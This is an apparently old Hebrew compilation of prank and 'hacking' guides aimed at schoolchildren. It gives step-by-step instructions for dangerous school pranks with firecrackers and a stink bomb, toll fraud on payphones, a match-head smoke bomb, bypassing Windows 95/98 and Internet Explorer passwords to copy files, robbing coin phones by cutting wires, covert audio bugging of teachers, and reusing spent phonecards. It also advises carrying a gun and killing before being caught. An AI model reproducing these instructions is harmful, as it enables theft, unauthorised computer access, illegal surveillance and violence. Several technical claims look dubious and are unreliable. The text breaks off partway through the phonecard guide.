‫‪ .11‬ללמוד‪(.‬חחח‪)...‬‬
‫‪ . 10‬לשים למורה לפני שהוא בא דבק על הכיסא ואז הוא מתיישב לאיזה חצי שעה ולא קם ‪...‬‬
‫‪.9‬להדביק ג'לי מגעיל על התקרה ואז כשהמורה יכנס לכיתה הג'לי ייפול לו על הראש והוא לא ישים‬
‫לב ‪.‬‬
‫‪.8‬לשים פתק על הגב של המורה ‪ -‬הכי בטוח וגם מצחיק ‪.‬‬
‫‪.7‬לכתוב בשירותים על הדלתות בגרפיטי ‪.‬‬
‫‪.6‬להביא פצצת סרחון ולזרוק לחדר מורים בתחילת היום ‪.‬‬
‫‪.5‬להוציא את הנייר טואלט מהשירותים ולהכניס אותו לאסלות בתחילת היום להוריד את כל המים‬
‫ולבוא ב ‪ 5‬לשמונה ולראות אקווריום ולא תיכון ‪.‬‬
‫‪.4‬לשים למורה בלון פלוצים ‪ ...‬ממש מצחיק ‪ (.‬אולי זה לא בעצם ) ‪.‬‬
‫‪.3‬לקחת את הנפצים הקטנים האלה שמוכרים אותם ב‪ 50‬ל‪ 3‬שקל ‪ -‬ולשים אותם מתחת ליומן של‬
‫הכיתה ‪ ,‬המורה יבוא וידפוק את היומן על הנפצים ואז הוא יקבל הלם ‪(.‬במקרה טוב הוא יהיה חירש‪-‬‬
‫סתם‪...‬לא יפה)‪.‬‬
‫‪ .2‬לטלפן לביה"ס ולעשות כאילו אתם ההורים של איזה ילד ולהגיד שאתם חייבים שהוא יחזור‬
‫הביתה בגלל אירוע משפחתי ‪ -...‬המזכירה תשחרר אותו והוא יגיע הביתה ולא ידע למה ‪( . ...‬או‬
‫לעשות את זה לכם כשאין לכם כוח ללמוד )‪.‬‬
‫‪.1‬‬
‫הדבר הכי פצצה‬
‫ללכת למזכירות ולבקש לטלפן לאחיך ולהגיד שזה בגלל אירוע משפחתי וזה דחוף‪ - ...‬אז במקום‬
‫להתקשר לאחיך תעשה לטלפון עקוב אחרי למספר ארוטי ‪ ...‬ואז כל מי שמתקשר לביה"ס מתבייש בו‬
‫וחושב שהוא הגיע למספר ארוטי=חחחח (את המספרים אפשר להשיג בכל סוף עיתון) ‪.‬‬
‫‪by old-hacker‬‬
‫שיחות חינם בטלפונים שעובדים על טלכרטים‬
‫כעת אני ילמד אתכם איך לזיין את "נזק" ולהשתמש בשירות גוביינא כדי לקבל‬
‫שיחות חינם ‪- .‬אחרי שתקראו את הפרק הזה אתם תגידו ביי לטלפון בבית ‪.‬‬
‫מצרכים ‪:‬‬
‫‪ .1‬צליל של ‪ - coin collet‬אפשר להוריד בפינת ההורדות באתר שלי ‪.‬‬

‫‪ .2‬אוזניות‬
‫‪ .3‬ווקמן\דיסקמן\ ‪ \ mp3player‬מיני דיסק ‪ -‬בקיצור כל דבר שאפשר להשמיע אייתו את הסאונד ‪(.‬‬
‫לאנשים מיוחדים ‪ -‬תנסו להתאמן לשרוק את הצליל ‪ -‬בצחוק ‪-‬אף אחד לא הצליח ולא יצליח ) ‪.‬‬
‫הפריצה‬
‫קודם כל מקליטים בבית על מכשיר ההקלטה (למשל ווקמן ) את הצליל‬

‫אח"כ הולכים לטלפון ציבורי ומחייגים‬
‫‪142‬‬
‫מצמידים את האוזניות לטלפון‬
‫מחכים ‪ 3\2‬שניות אחרי שעונים ומשמעים את הצליל לטלפון ויש קריין שמבקש ממך שתכניס סיסמא‬
‫‪.‬‬
‫הסיסמא היא אחד מהאפשריות הבאות ‪:‬‬
‫‪0000001‬‬
‫‪0000002‬‬
‫‪0000003‬‬
‫‪0000004‬‬
‫‪0000005‬‬
‫‪0000006‬‬
‫‪0000007‬‬
‫‪0000008‬‬
‫‪0000009‬‬
‫‪00000010‬‬
‫מתחילים משמאל ‪.‬‬
‫*הסיסמא אחרי כל שיחה משתנה ‪.‬‬
‫תנסו את כל ‪ 10‬האפשריות וכשתגלו את הסיסמא תשמעו צליל של קו ותחייגו לאן שבא לכם ‪.‬‬
‫יש לכם עכשיו טלפון חינם‪.‬‬
‫פצצת עשן‬
‫אני אלמד אתכם עכשיו איך להכין פצצת עשן !!‬
‫חומרים ‪:‬‬
‫הקרטון של המחברת (עדיף קרטון חלש )‬
‫דבק‬
‫חול‬
‫‪ 3‬קופסאות גפרורים‬
‫נייר דבק‬
‫נייר‬
‫הוראות הכנה‬
‫לוקחים ת' מחברת ומפרקים לה את הצורה ‪ -‬סתם‪...‬‬
‫‪ .1‬לוקחים את הקרטון וחותכים מרובע ‪.‬‬

‫‪ 2‬מדביקים עם נייר דבר‬
‫‪.3‬לוקחים את הראשים של הגפרורים ומפרקים אותם (גפרור אחד משאירים)‬
‫‪.3‬לוקחים דבק וחול מערבבים ויוצא כזאת עיסה ‪ ,‬שופכים אליה את ראשי הגפרורים‪.‬‬
‫‪.4‬מבאים נייר ארוך ושמים אותו מסוף הקרטון להתחלה ומוצאים בערך ‪ 3‬ס"מ‬
‫מהקרטון‪.‬‬
‫‪.5‬עושים מהכל גליל ‪.‬‬
‫‪ .6‬מדליקים את הנייר שנשאר בחוץ עם הגפרור שנשאר ‪ -‬יש עשן(הרבה‪ ... )...‬אם‬
‫תשימו יותר גפרורים יהיה יותר עשן ‪.‬‬
‫איור ‪:‬‬
‫ככה בערך אמור לצאת‬
‫______________________________‬
‫&*&*&*&*&**&**&*&*&*****‬
‫&*&*&*&*&*&*&*&*&*******‬
‫>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>‬
‫&*&*&**&*&**&*&*&**&&***‬
‫_&&*&*&&*&&*&*&_&****____‬
‫בהתחלה כדי לשים יותר ראשי גפרורים מדבק ‪ -‬כדי שיידלק טוב ‪.‬‬
‫מקרא ‪:‬‬
‫_ = גליל‪.‬‬
‫& = עיסה של הדבק והחול ‪.‬‬

‫*=ראשי גפרורים ‪.‬‬
‫>>> = נייר‬

‫פריצת סיסמאות ‪windows95/98‬‬
‫כתבתי את הכתבה הזאת כדי להראות לכם כמה שהווינדוס שלכם לא מוגן‪.‬‬
‫בעוד עשר‪ ,‬חמש עשרה דקות‪ ,‬כשתגמרו כבר לקרוא את הכתבה‪,‬‬
‫אתם תעריכו את המערכת הפעלה שלכם הרבה פחות‪ ,‬את עצמכם הרבה יותר‪,‬‬
‫ותוכלו להראות לחברים שלכם איזה ידע נפלא יש לכם‪ .‬אבל הכי חשוב‪,‬‬
‫תוכלו לחדור לכל מחשב שמותקן עליו ‪ windows95/98‬אפילו אם הוא מוגן עם סיסמא‪.‬‬
‫רק דבר אחד לפני שאנחנו מתחילים ‪ -‬הפריצה הזאת היא פריצה לוקלית‪ ,‬מקומית‪.‬‬
‫כלומר היא עובדת רק אם יש לכם גישה פיזית למחשב שאליו אתם חודרים‪ .‬יעיל מאוד במקרים‬
‫הבאים‪:‬‬
‫בי"ס‪ ,‬מפעלים‪ ,‬בנקים‪ ,‬חנויות‪ ,‬חברים‪ ,‬וכו'‬
‫הגנת סיסמא‬
‫דבר ראשון‪ ,‬כדי להראות לכם איך לפרוץ את הסיסמא‪ ,‬צריך קודם להגן עם סיסמא‪.‬‬
‫איך אפשר לפרוץ משהו שלא קיים? אי אפשר‪.‬‬
‫לכן אם הווינדוס שלכם עוד לא מוגן בעזרת סיסמא‪ ,‬עשו את הצעדים הבאים‪:‬‬
‫לחצו על התחל‪ ,‬אפשרויות‪ ,‬לוח בקרה‪.‬‬

‫עכשיו לחצו על סיסמאות‪ ,‬תבחרו סיסמא שתוכלו לזכור‪ ,‬ותקלידו אותה‪.‬‬
‫התחילו את המחשב מהתחלה‪ .‬כמו שאתם רואים‪ ,‬הווינודס יבקש סיסמא‪ .‬כיתבו סיסמא לא נכונה‪.‬‬
‫מה קרה?‬
‫עכשיו כיתבו את הסיסמא הנכונה‪ ...‬מה קרה הפעם?‬
‫כמו שאתם רואים‪ ,‬אי אפשר להיכנס לווינדוס בלי לדעת את הסיסמא‪ ,‬נכון?‬
‫‪ =====---‬לא‪ ,‬לא נכון! =====‪---‬‬
‫פריצת הסיסמא‬
‫אני אראה לכם פה כמה שיטות‪ ,‬אנא נסו את כולם‪.‬‬

‫אח"כ תבחרו את זו שאתם הכי אוהבים‪ ,‬ותעשו חיים‪.‬‬
‫שיטה מספר ‪1‬‬
‫* התחילו את המחשב מהתחלה‬
‫* לחצו ברציפות על כפתור ה ‪ f5‬הרבה פעמים בלי להפסיק‪.‬‬
‫מה שיקרה זה שהוונידוס יתחיל במצב ‪safe mode‬‬

‫מצב זה נועד לתיקון תקלות בווינדוס‪ ,‬ולכן אינו מבקש סיסמא‪.‬‬
‫אומנם הכל ייראה קצת מוזר‪ ,‬ולא תוכלו להתחבר לאינטרנט‪,‬‬
‫אבל כל התוכנות יעבדו חלק‪ ,‬ויש לכם גישה להכל‪.‬‬
‫אם הסיסמא נועדה לדוגמא להגן על קבצי טקסט מסוימים‪,‬‬
‫אז הרגע שברתם את ההגנה העלובה‪ ,‬ואתם יכולים לגשת לקבציי טקסט ה"מוגנים" האלה‪.‬‬
‫אתם תקבלו תפריט שייתן לכם לבחור איך להתחיל את המחשב‪ .‬בחרו ב ‪command prompt only‬‬
‫מה שיקרה זה שהמחשב ייכנס לדוס‪ .‬למי שלא מכיר‪ ,‬דוס זה בעצם מערכת הפעלה שפועלת ע"י‬
‫פקודות מהמשתמש‪.‬‬
‫ווינדוס בעיקרון מבוסס על הגרעין של דוס אבל לא חשוב‪.‬‬
‫עכשיו הקלידו את השורה הבאה ולחיצו על מקש ה ‪:enter‬‬
‫‪rename c:\windows\*.pwl c:\windows\*.xxx‬‬
‫מה שבעצם קורה פה זה הדבר הבא‪:‬‬

‫מכיוון שאתם לא נכנסים לווינדוס עדיין‪ ,‬אז אתם לא צריכים להקליד סיסמא‪.‬‬
‫עכשיו‪ ,‬כשאתם כן צריכים להקליד סיסמא‪ ,‬כלומר כשאתם כן נכנסים לווינדוס‪ ,‬אז איך המחשב יודע‬
‫אם הסיסמא‬
‫שכתבתם נכונה או לא? פשוט מאוד‪ .‬הוא משווה את מה שאתם כתבתם לסיסמא האמיתית שנמצאת‬
‫בתוך קובץ על‬
‫המחשב‪ .‬אם מה שכתבתם תואם למה שבקובץ‪ ,‬הוא יודע שזה הסיסמא הנכונה‪ ,‬אם לא‪ ,‬אז הוא יודע‬
‫שלא‪.‬‬
‫עכשיו‪ ,‬אם כך אז כל מה שהאקר צריך לעשות זה לפתוח את הקובץ ההוא‪ ,‬ואז הוא יודע את‬
‫הסיסמא‪ ,‬נכון?‬
‫לכן מה שמיקרסופוט עשתה זה הצפינו אותו ע"י פעולה מתמטית‪ ,‬כאשר כל פעם שהם משווים בין‬
‫הקבצים‬
‫הם עושים את אותה הפעולה למה שהקלדתם ואז משווים‪ ,‬כך אם תפתחו את אותו הקובץ‪,‬‬
‫הסיסמא תיראה באותיות לא מובנות ולא תוכלו לדעת מה היא אלא אם כן תדעו את אותה‬
‫פעולה מתמטית ואז תתכנתו משהו שעושה את אותה הפעולה אבל הפוך‪.‬‬
‫הבעיה שלא תוכלו לדעת מה היא אותה פעולה מתמטית‪...‬‬
‫בכל מקרה‪ ,‬אנחנו לוקחים את אותו הקובץ (‪ ,).pwl‬ומשנים אותו ל ‪.xxx‬‬
‫כמו כן תוכלו לשנות אותו לכל דבר אחר‪ ,‬לדוגמא‪:‬‬
‫‪rename c:\windows\*.pwl c:\windows\*.fuk‬‬

‫העיקר הוא שלקובץ לא יהיה שיוך‪ .‬כלומר שהווינדוס לא יזהה את סוג הקובץ‪ .‬לדוגמא אל תהפכו את‬
‫זה ל‪:‬‬
‫‪ - .jpg‬גרפיקה‬
‫‪ - .gif‬גרפיקה‬
‫‪ - .bmp‬גרפיקה‬
‫‪ - .txt‬מסמך טקסט‬
‫‪ - .doc‬מסמך של וורד‬
‫‪ - .ppt‬מסמך של פאור פוינט‬
‫‪ - .mp3‬קובץ סאונד‬
‫‪ - .wav‬קובץ סאונד‬
‫‪ - .mid‬קובץ סאונד‬
‫אני חושב שקלטתם את הרעיון‪...‬‬

‫עכשיו‪ ,‬תתחילו את המחשב מהתחלה‪.‬‬
‫אתם אומנם תקבלו את התיבה שמבקשת סיסמא‪ ,‬אך תוכלו להקליד איזה סיסמא שבא לכם‪...‬‬
‫זה ‪ 100%‬יעבוד‪ .‬זאת מכיוון שהווינדוס לא מוצא את הקובץ שאליו הוא אמור להשוות‪ .‬ולכן כל מה‬
‫שתקלידו‬
‫יהיה נכון‪ .‬הווינדוס יקבל את זה כסיסמא חדשה‪ ,‬זאת מכיוון ששוב‪ ,‬הווינדוס לא מוצא שום קובץ‬
‫סיסמא‬
‫במחשב‪ ,‬ולכן תתבקשו לאשר את הסיסמא החדשה‪ .‬עכשיו‪ ,‬כשאתם גומרים לעשות מה שרציתם‬
‫לעשות עם המחשב‪,‬‬
‫החזירו את הסיסמא הישנה כדי שאף אחד לא ידע מה שעשיתם‪ ....‬איך מחזירים את הסיסמא‬
‫הישנה?‬
‫פתחו חלון דוס‪ ,‬והקלידו את השורה הבאה ולאחר מכן לחצו על מקש ה ‪:enter‬‬
‫‪rename c:\windows\*.xxx c:\windows\pwl‬‬
‫או אם שיניתם ל ‪ .fuk‬אז הקלידו את זה כך‪:‬‬
‫‪rename c:\windows\*.fuk c:\windows\pwl‬‬
‫שיטה מספר ‪ 3‬מבוססת על שיטה מספר ‪.2‬‬
‫אתם תקבלו תפריט שייתן לכם לבחור איך להתחיל את המחשב‪ .‬בחרו ב ‪command prompt only‬‬
‫עכשיו‪ ,‬הרעיון בשיטה ‪ 3‬זה לא להיכנס לווינדוס‪ ,‬אלא פשוט להשיג גישה לקבצים על המחשב‪.‬‬
‫למי שמכיר את דוס‪ ,‬שייהנה‪ .‬למה שלא‪ ,‬אני אתן פה קצת עזרה‪...‬‬
‫תבדקו שאתם בספרייה הראשית‪ ,‬כדי לעשות זאת הקלידו‪:‬‬
‫\‪c:‬‬
‫עכשיו שאתם בספרייה הראשית הקלידו‬
‫‪dir‬‬
‫כדי להיכנס לספרייה ששם נמצאים הקבצים שאתם רוצים הקלידו‬
‫‪cd directory‬‬
‫לדוגמא אם לספרייה קוראים ‪ xfiles‬אז תקלידו‬
‫‪cd xfiles‬‬
‫ואם לספרייה קוראים ‪ games‬אז תקלידו‬
‫‪cd games‬‬
‫עכשיו שוב הקלידו‬
‫‪dir‬‬
‫הכניסו דיסקט לכונן דיסקטים ותעתיקו את הקבצים שאתם רוצים‪ .‬אם אתם רוצים את כולם‪,‬‬
‫הקלידו‬
‫‪copy *.* a:‬‬
‫אם אתם רוצים קובץ מסוים‪ ,‬לדוגמא ‪ game.exe‬הקלידו‬
‫‪copy game.exe a:‬‬
‫זהו‪ ,‬סיימנו לכתבה הזאת‪ ,‬ורק לסיכום‪,‬‬

‫אם עד עכשיו חשבתם שהקבצים שלכם במחשב מוגנים‪ ,‬כדאי שתחשבו עוד פעם‪ .‬עד לכתבה הבאה‪.‬‬
‫‪gehenom‬‬
‫איך לגנוב כסף ממכשירי טלפון‬
‫מכירים את המכשירים האלה ששמים שקל ואז אפשר להתקשר?‬

‫אפשר למצוא אותם בעיקר באיזה מקום תקוע בעיר‪ ,‬במוסדות חינוך‪ ,‬ומתנ"סים‪.‬‬
‫שדידת מכשיר טלפון כזה צורכת רק כמה דברים פשוטים‪ .‬לכן גם השרוטים שביניכם יוכלו לעשות‬
‫זאת‪.‬‬
‫דבר ראשון‪ ,‬אל תתנהגו כמו מטומטמים‪ .‬אתם בני זונות‪ .‬תזכרו את זה‪.‬‬
‫או במילים אחרות‪ ,‬אל תבואו באמצע היום מול מלא אנשים לעשות את עבודתכם‪.‬‬
‫כמו כן אל תכריזו לפני כל החברים שלכם שגנבתם ‪ 500‬שקל מאיזה טלפון ציבורי בצומת‪...‬‬
‫טוב‪ ,‬כעת מייצאו טלפון כזה שיש לכם גישה לחוטי החשמל שלו‪.‬‬
‫פשוט חפשו את הכבל שמתפתל צמוד לקיר או את המצמת (תיבת חיבור)‪.‬‬
‫עכשיו‪ ,‬בקו טלפון רגיל‪ ,‬יהיה שני חוטי חשמל‪ .‬אדום וירוק‪.‬‬
‫בטלפון מסוג כזה‪ ,‬יהיו ארבעה‪ .‬אדום וירוק לתפעול התקשורת (העברת פולסים ושטויות)‪,‬‬
‫וצהוב ושחור בשביל בדיקת המטבעות‪ .‬חפשו מקום בכבל שבו חתך לא ייראה בולט לעין‪.‬‬
‫שליפו את הסכין שלכם וחיתכו בעדינות חלק מן הכבל כך שייחשפו ארבעת חוטי החשמל הצבעוניים‪.‬‬
‫חיתכו לגמרי את השחור והצהוב והניחו לאנשים לנסות להשתמש בטלפון‪!...‬‬
‫מה קורה פה?‬

‫^^^^^^^^^^^‬
‫ובכן‪ ,‬כשאתם שמים לדוגמא מטבע של ‪ 5‬שקל בתא הרסיבר (‪ )receiver‬של המכשיר בכדי לעשות‬
‫שיחה‪,‬‬
‫המטבע נופל לתוך תיבת המטבעות הזמנית ונשאר שם עד שאחד משלושת הדברים הבאים קורים‪:‬‬
‫* התקשרתם‪ ,‬דיברתם‪ ,‬ניתקתם‪ ,‬והמטבע נשלך מתוך תיבת המטבעות הזמנית אל תיבת המטבעות‬
‫הרגילה‬
‫ופוגש שם את כל השקלים שהיו שם לפני כן ונשאר שם עד שטכנאי מוסמך של בזק בא עם מפתח‬
‫מיוחד‪ ,‬פותח את התיבה‪ ,‬ומוציא את כל הכסף‪...‬‬
‫* התקשרתם‪ ,‬דיברתם‪ ,‬ניתקם‪ ,‬אבל שילמתם יותר ממה שהיה צריך‪ .‬הכל מחושב‪ ,‬העודף נופל‬
‫לתיבת העודף‪,‬‬
‫והשארית לתיבת המטבעות הרגילה ופוגש שם את כל השקלים שהיו שם לפני כן ונשאר שם עד‬
‫שטכנאי‬
‫מוסמך של בזק בא עם מפתח מיוחד‪ ,‬פותח את התיבה‪ ,‬ומוציא את כל הכסף‪...‬‬
‫* התקשרתם‪ ,‬אף אחד לא ענה‪ ,‬או שהיה תפוס‪ ,‬או משהו דומה‪ ,‬ואז ניתקתם‪.‬‬
‫ברגע שניתקתם המטבע נופל מתיבת המטבעות הזמנית ישר לתוך תא העודף‪.‬‬
‫זה פחות או יותר הסוד שעומד מאחורי רעיון השדידה שלנו פה‪.‬‬
‫אתם פשוט מאוד חוזרים בשעה ‪ 3:00‬לפנות בוקר‪ ,‬מחברים בחזרה את חוט החשמל השחור‬
‫וגם כמובן את חוט החשמל הצהוב‪ ,‬מדביקים עם סלוטייפ או משהו‪ ,‬מרימים את השפופרת‬
‫ומקשיבים לצליל שאומר שיש קו (בפממממממממממממממ‪ ,)...‬ומנתקים‪.‬‬
‫החלק הכייפי‬
‫‪#############‬‬
‫הכסף יתחיל להתגלגל החוצה בדיוק כמו בסרטים!!!!!‬

‫מומלץ להכין שקית מראש‪ ,‬למה לא בטוח שיהיה מקום בכיסים‪.‬‬
‫השיא שלי זה ‪ 614‬שקל בלילה יחיד!!! (כמובן שעשיתי את זה ביותר מטלפון אחד באותו לילה)‪.‬‬
‫כמה טיפים‪:‬‬
‫* מומלץ ללבוש בגדים שחורים‪.‬‬
‫* מומלץ לבוא עם אופנוע‪.‬‬
‫* מומלץ להיזהר מגמדים הומואים שמנים בכחול שיוצאים מניידת כחולה ומגעילה‪.‬‬
‫* אם מישהו רואה אתכם‪ ,‬פשוט תגידו לו שהכל נפל ככה סתם‪ .‬גם לא יזיק לתת לו קצת אחוזים‪...‬‬
‫רק הערה אחרונה‪ :‬כשאנשים ישימו שקל או שתיים אחרי שחתכתם את החוטים‪ ,‬הכסף יישאר‬
‫במכונה‪,‬‬
‫והם גם לא יוכלו להתקשר‪ ,‬כי החוטים שאחראים על בדיקת המטבעות לא יהיה פעילים‪...‬‬
‫אם זה יעצבן אותם מאוד‪ ,‬הם עלולים לקרוא לטכנאי של בזק‪ .‬לכן תבואו עם אקדח למקרה חירום‪.‬‬
‫עדיף להרוג מאשר לשבת מאחורי סורגים‪ .‬באמת‪.‬‬
‫אז עד הפעם הבאה‪,‬‬
‫‪gehenom‬‬
‫הכנת מכשיר ציטוט מהפלאפון‬
‫אוהבים את ג'יימס בונד? אני לא‪.‬‬

‫בכל מקרה‪ ,‬מסקר שערכנו יוצא כי הפלאפון הפופולרי‬
‫ביותר באזור ירושלים הוא ה ‪ nokia 5110‬של רשת אורנג'‪.‬‬
‫ובכן‪ ,‬עם הפלאפון הזה אתם יכולים להכין מכשיר‪ ,‬אשר בעזרתו תוכלו לצטט לאנשים‪.‬‬
‫זה לא כמו הציטוט לשיחות עם המוטורלה של רשת פלאפון‪ ,‬אלא ממש מכשיר האזנה אמיתי כמו של‬
‫המשטרה‪.‬‬
‫מחביאים אותו באיזה מקום בחדר ואז אפשר לשמוע את כל שמדברים שם‪ .‬לדוגמא‪ ,‬תשאירו אותו‬
‫בכיתה ביום של אסיפת הורים ותשמעו בדיוק מה המורה שלכם אומר לכל הורה והורה‪ .‬זה אמנם לא‬
‫חוקי‪,‬‬
‫ועובר על חופש הפרט‪ ,‬אבל צוות האתר סומך על כך שתשתמשו בזה נכון ורק למקרים הנכונים‪.‬‬
‫אף אחד לא שם זין על החוק‪ ,‬אבל אם אין לכם כבוד לבני אדם אחרים אז איבדתם משהו‪...‬‬
‫בכל מקרה‪ ,‬להכנת מכשיר כזה מהפלאפון שלכם אתם צריכים את הכלים הבאים‪:‬‬
‫* פלאפון מדגם ‪ 5110‬של נוקיה‬
‫* את הכתבה הזאת (מומלץ להדפיס)‬
‫* את המוח שלכם (מומלץ לבדוק שהוא עובד ע"י דפיקת הראש בקיר)‬
‫טוב‪ ,‬כעת דבר ראשון שתעשו הוא להגדיר את הפלאפון ל"מענה אוטומטי" ולשים אותו במצב שקט‪.‬‬
‫ועכשיו גבירותיי ורבותיי‪,‬‬
‫החלק המתוחכם שעושה את כל הקסם‪ .‬בתחתית הפלאפון‪ ,‬ישנם פינים‪ ,‬שכאשר מחברים ביניהם‪,‬‬
‫עלול להיווצר קצר‪ .‬קחו חוט חשמל‪ ,‬ובזהירות חברו בין הפין האמצעי בצד שמאל לפין הימני‪.‬‬
‫ברגע שזה ייקרה הפלאפון שלכם ייתקע ומייד ייכנס למצב 'אוזנייה'‪.‬‬
‫כעת כל שעליכם לעשות הוא להחביא את הפלאפון איפושהו בחדר של הקורבן‪.‬‬
‫עכשיו לכו הביתה והתקשרו מהטלפון שלכם או מאיזה פלאפון שגנבתם למספר של הפלאפון שאותו‬
‫הפכתם למכשיר האזנה‪ .‬הפלאפון מיד יקבל את השיחה‪ ,‬מה שלא עולה כסף כי זאת שיחה נכנסת‪,‬‬
‫ואתם‬
‫תשמעו את כל מה שמי שנמצא באזור הפלאפון שלכם אומר ועושה‪ .‬רק תזכרו שמכשיר האזנה עולה‬
‫הרבה יותר‬
‫מפלאפון‪ ,‬ולכן אם אתם משתמשים במידע זה בכדי להכין מכשיר כזה מהפלאפון שלכם‪ ,‬לא יזיק אם‬
‫תשלחו‬
‫לי ‪ 300 ,200‬שקל בדואר‪.‬‬
‫שלכם‪,‬‬
‫‪gehenom‬‬
‫פריצת סיסמת הצנזורה של ‪internet explorer‬‬
‫הדפדפן של מיקרוסופט‪ ,‬עם כל הדברים הטובים שבו‪ ,‬והפופלריות שלו‪ ,‬הוא לא הדפדפן הכי מוגן‪.‬‬
‫בכתבה הזאת אני אראה לכם משהו שלא ממש רציתם לדעת על הדפדפן אינטרנט שאתם כל כך‬
‫אוהבים‪.‬‬
‫כפי שידוע‪ ,‬בדפדפן של מיקרוסופט קיימת האפשרות לצנזר אתרים מסוימים ולחסום אליהם את‬
‫הגישה‪.‬‬
‫הדבר נועד למורים‪/‬הורים שלא רוצים שאנחנו הילדים נוכל להיכנס לאתרי פורנוגרפיה‪ ,‬אנרכיה‪ ,‬וכו'‬
‫אבל לפני שאני אראה לכם איך להוריד את הגנת הסיסמא‪ ,‬קודם‪ ,‬לאלה מכם שלא מצנזרים להם‪,‬‬
‫אני רק אראה למה אני מתכוון‪ .‬פיתחו את הדפדפן (‪.)internet explorer‬‬
‫לחצו על תפריט ‪tools‬‬

‫בחרו ב ‪internet options...‬‬
‫חלון חדש ייפתח‪ ,‬עם כל מיני תפריטים כגון‪ ,general, security, content, connections :‬ועוד‪...‬‬
‫לחצו על ‪content‬‬
‫התבוננו ב ‪ content advisor‬לרגע‪.‬‬
‫זה נועד לחסום גישה לאתרים‪ ,‬ואפשר להוריד את החסימה רק על ידי סיסמא‪.‬‬
‫כדי להראות לכם למה אני מתכוון לחצו על כפתור ה ‪enable‬‬
‫ותפעילו את החסימה‪ .‬שימו סיסמא שתוכלו לזכור‪ .‬סגרו את הדפדפן‪.‬‬
‫פיתחו אותו מחדש‪ .‬עכשיו נסו להיכנס לאתר שחסמתם‪ .‬מה קורה? יפה‪.‬‬
‫עכשיו נסו להוריד את החסימה‪ .‬זה יבקש ממכם סיסמא‪ .‬אתם כמובן יודעים אותה‪ ,‬כי אתם בחרתם‬
‫אותה‪,‬‬
‫אבל נניח אתם לא יודעים אותה‪ .‬הקלידו סיסמא שגויה‪ .‬מה קורה? אחלה‪ .‬עכשיו את הסיסמא‪.‬‬
‫כמו שאתם רואים אתם עכשיו יכולים לבטל את החסימה‪ .‬אבל אל תבטלו‪ .‬עכשיו הגיע הזמן שתראו‬
‫איך‬
‫פורצים את זה בלי לדעת את הסיסמא‪ .‬מוכנים? אני ממליץ להדפיס את הקטע הבא‪,‬‬
‫כי זה לא משהו שקל לזכור בעל פה‪ .‬אז איך בדיוק עושים את זה? עם הרג'יסטרי‪.‬‬
‫‪windows registry‬‬
‫מה זה הרג'יסטרי?‬
‫הרג'יסטרי זה פשוט דאטאבייס (‪ )database‬ענק שבווינדוס ‪ nt/95/98‬הוא בעצם‬
‫מחליף את כל קבצי ה ‪ .pif‬וה ‪ .ini‬ועוד כל מיני קבצי אינפורציה שהיו לנו בווינדוס ‪ 3.11‬ו ‪3.1‬‬
‫אז במילים אחרות‪ ,‬כל האפשרויות (‪ )settings‬של החומרה‪ ,‬וכל מיני תוכנות נמצאות שם‪ .‬עכשיו‬
‫הכירו את‬
‫עורך הרג'יסטרי ‪ .regedit -‬אתם תשמשו בעורך הזה הרבה‪ .‬אם כדי לתקן בעיות במחשב‪ ,‬לעשות‬
‫שיפורים‪,‬‬
‫או לדוגמא‪ ,‬לפרוץ את סיסמת ההגנה של אינטרנט אקספלורר‪.‬‬
‫אני עכשיו לא אראה לכם צעד אחר צעד איך משתמשים בעורך‪ ,‬כי זה לוקח זמן‪.‬‬
‫מה שכן‪ ,‬אני אראה לכם צעד אחר צעד איך לפרוץ את הסיסמא‪.‬‬
‫פריצת הסיסמא‬
‫כשהדפדן פתוח‪ ,‬עשו את הצעדים הבאים‪:‬‬

‫* לחצו על התחל‬
‫* הפעלה‪...‬‬
‫* הקלידו‪ regedit :‬ולחיצו על ‪enter‬‬
‫העורך ייפתח‪ .‬לחיצו לחיצה כפולה על‪:‬‬
‫‪hkey_local_machine -> software -> microsoft -> windows -> current version -> policies‬‬
‫התבוננו בציידו הימיני של העורך‪ .‬אם יש הגנת סיסמא‪ ,‬אתם תראו משהו שכתוב עליו ‪.key‬‬
‫סמנו את זה עם העכבר ולחיצו על מקש ה ‪ .delete‬לאחר שמחקתם את זה‪ ,‬הסיסמא כבר לא תהיה‬
‫קיימת‪.‬‬
‫זה מכיוון שהסיסמא הייתה בפנים‪ .‬היא פשוט הייתה מוצפנת כמובן‪ ....‬זאת כדי שלא תוכלו לדעת‬
‫מה היא‪,‬‬
‫אם כי קיימות תוכנות שהופכות את זה לטקסט נקי ומראות לכם מה הסיסמא‪ .‬אבל תוכנות כאלה‬
‫בד"כ לא ניתנות‬
‫להפצה בחינם‪ ,‬והם בהחלט לא שוות את הכסף שמבקשים עבורם‪ .‬אם אתם בכל זאת מעונינים‪ ,‬נסו‬
‫את האתר הבא‪:‬‬
‫‪http://www.ntbugtraq.com‬‬
‫רק הערה אחרונה ‪ -‬אחרי שאתם מוחקים את הסיסמא‪ ,‬תסגרו את הדפדפן‪ ,‬ותיכנסו אליו שוב‪.‬‬
‫תעשו את זה כדי שהדפדפן יידע שאין יותר סיסמא‪ .‬הוא בודק ברג'יסטרי רק כשהוא נפתח מחדש‪.‬‬
‫לכן אם הוא פתוח כשאתם מוחקים את הסיסמא‪ ,‬הוא לא יידע שמחקתם‪ ,‬ויבקש סיסמא‪...‬‬
‫אז פשוט סגרו את הדפדפן‪ ,‬ואז תפתחו אותו שוב‪ ,‬ולא יהיה בעיות‪.‬‬
‫זהו‪.‬‬
‫עכשיו לכו לבי"ס‪,‬‬
‫תעיפו את ההגנה של הדפדפן‪ ,‬ותגלשו חופשי‪.‬‬
‫‪gehenom‬‬
‫שימוש חוזר בכרטיסי טלכרט‬
‫כ‪-‬ע‪-‬ת תלמדו איך להשתמש בכרטיסי טלכרט שנגמרו'‪.‬‬

‫דבר ראשון‪ ,‬עליכם למצוא כמה טלכרטים מ ש ו מ ש י ם‪ .‬כן‪ ,‬משומשים‪.‬‬
‫בשביל זה לכו לאוסף טלכרטים של אח שלכם הקטן ותגנבו לו חאפלה של איזה ‪.20‬‬
‫עדיף טלכרטים ישנים‪ ,‬למה הרבה מהחדשים מוגנים מפני הטריק שאני אראה לכם פה‪.‬‬
‫כמו כן עדיף שיהיה לכם איזה ‪ 20‬כי בניסיונות הראשונים זה בד"כ לא יוצא משהו ומה שקורה‬
‫זה שהטלכרט נהרס‪ ...‬לכן תדאגו שיהיה לכם כמות מכובדת‪ .‬אוקי‪ ,‬עכשיו פתחו קלטת וידיאו ריקה‪.‬‬
